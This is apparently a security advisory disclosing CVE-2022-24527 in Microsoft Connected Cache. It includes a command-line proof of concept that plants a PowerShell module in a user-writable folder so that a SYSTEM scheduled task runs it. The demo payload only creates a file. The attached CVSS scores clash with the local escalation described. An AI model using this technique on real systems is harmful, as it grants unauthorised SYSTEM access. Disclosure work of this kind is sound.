8.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
On April 12, 2022, Microsoft published CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache. The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as SYSTEM
due to improper file permission assignment (CWE-732).
Connected Cache is a feature used by Microsoft Endpoint Manager βDistribution Pointsβ to support βDelivery Optimization.β
This issue was discovered and reported by security researcher Jake Baines as part of Rapid7βs vulnerability disclosure program.
When Connected Cache is in use on a Distribution Point, it is installed, in part, into C:\Doinc\
. Below, you can see that there are some Powershell scripts within that directory:
C:\>dir /s /b C:\Doinc\
C:\Doinc\Product
C:\Doinc\Product\Install
C:\Doinc\Product\Install\Logs
C:\Doinc\Product\Install\Tasks
C:\Doinc\Product\Install\Tasks\CacheNodeKeepAlive.ps1
C:\Doinc\Product\Install\Tasks\Maintenance.ps1
C:\Doinc\Product\Install\Tasks\SetDrivesToHealthy.ps1
Low-privileged users only have read
and execute
permissions on the Powershell scripts.
C:\Doinc\Product\Install\Tasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Maintenance.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
SetDrivesToHealthy.ps1 NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 3 files; Failed processing 0 files
The Powershell scripts are executed every 60 seconds by the Task Scheduler as NT AUTHORITY\SYSTEM
. All that is fine. The following part is where trouble begins. This is how SetDrivesToHealthy.ps1
starts:
try
{
import-module 'webAdministration'
$error.clear()
When SetDrivesToHealthy.ps1
executes, it attempts to load the webAdministration
module. Before searching the normal %PSModulePath% path, SetDrivesToHealthy.ps1
looks for the import in C:\Doinc\Product\Install\Tasks\WindowsPowerShell\Modules\webAdministration\
. As we saw above, this directory doesnβt exist. And while low-privileged users canβt modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to C:\Doinc\Product\Install\Tasks\
:
C:\Doinc\Product\Install>icacls ./Tasks/
./Tasks/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
NT AUTHORITY\NETWORK SERVICE:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
An attacker can create the necessary directory structure and place their own webAdministration
so that SetDrivesToHealthy.ps1
will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file C:\r7
.
C:\Doinc\Product\Install\Tasks>dir C:\
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:\
01/04/2022 05:01 PM <DIR> Doinc
01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM <DIR> inetpub
07/07/2021 04:05 AM <DIR> PerfLogs
01/05/2022 09:29 AM <DIR> Program Files
01/05/2022 09:29 AM <DIR> Program Files (x86)
01/05/2022 09:16 AM <DIR> SCCMContentLib
01/05/2022 09:15 AM <DIR> SMSPKGC$
01/05/2022 09:17 AM <DIR> SMSSIG$
01/05/2022 09:17 AM <DIR> SMS_DP$
01/04/2022 05:04 PM <DIR> Users
01/04/2022 03:48 PM <DIR> Windows
0 File(s) 0 bytes
12 Dir(s) 239,837,327,360 bytes free
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\
C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\webAdministration\
C:\Doinc\Product\Install\Tasks>echo New-Item C:\r7.txt > WindowsPowerShell\Modules\webAdministration\webAdministration.psm1
C:\Doinc\Product\Install\Tasks>dir C:\
Volume in drive C has no label.
Volume Serial Number is 3073-81A6
Directory of C:\
01/04/2022 05:01 PM <DIR> Doinc
01/04/2022 05:15 PM <DIR> DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022 03:48 PM <DIR> inetpub
01/05/2022 01:49 PM 0 r7.txt
07/07/2021 04:05 AM <DIR> PerfLogs
01/05/2022 09:29 AM <DIR> Program Files
01/05/2022 09:29 AM <DIR> Program Files (x86)
01/05/2022 09:16 AM <DIR> SCCMContentLib
01/05/2022 09:15 AM <DIR> SMSPKGC$
01/05/2022 09:17 AM <DIR> SMSSIG$
01/05/2022 09:17 AM <DIR> SMS_DP$
01/04/2022 05:04 PM <DIR> Users
01/04/2022 03:48 PM <DIR> Windows
1 File(s) 0 bytes
12 Dir(s) 239,836,917,760 bytes free
C:\Doinc\Product\Install\Tasks>icacls C:\r7.txt
C:\lol.txt NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Doinc\Product\Install\Tasks>
As you can see, the C:\r7.txt
file is created, demonstrating the privilege escalation.
Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.
January 5, 2022: Issue disclosed to the vendor **January 5, 2022:**Vendor acknowledgement **January 6, 2022:**Vendor assigns a case identifier **January 10-11, 2022:**Vendor and researcher discuss clarifying details **January 19, 2022:**Vendor confirms the vulnerability **February-March 2022:**Vendor and researcher coordinate on disclosure date and CVE assignment April 12, 2022: Public disclosure (this document)
Additional reading:
Get the latest stories, expertise, and news about security today.
Subscribe
8.6 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N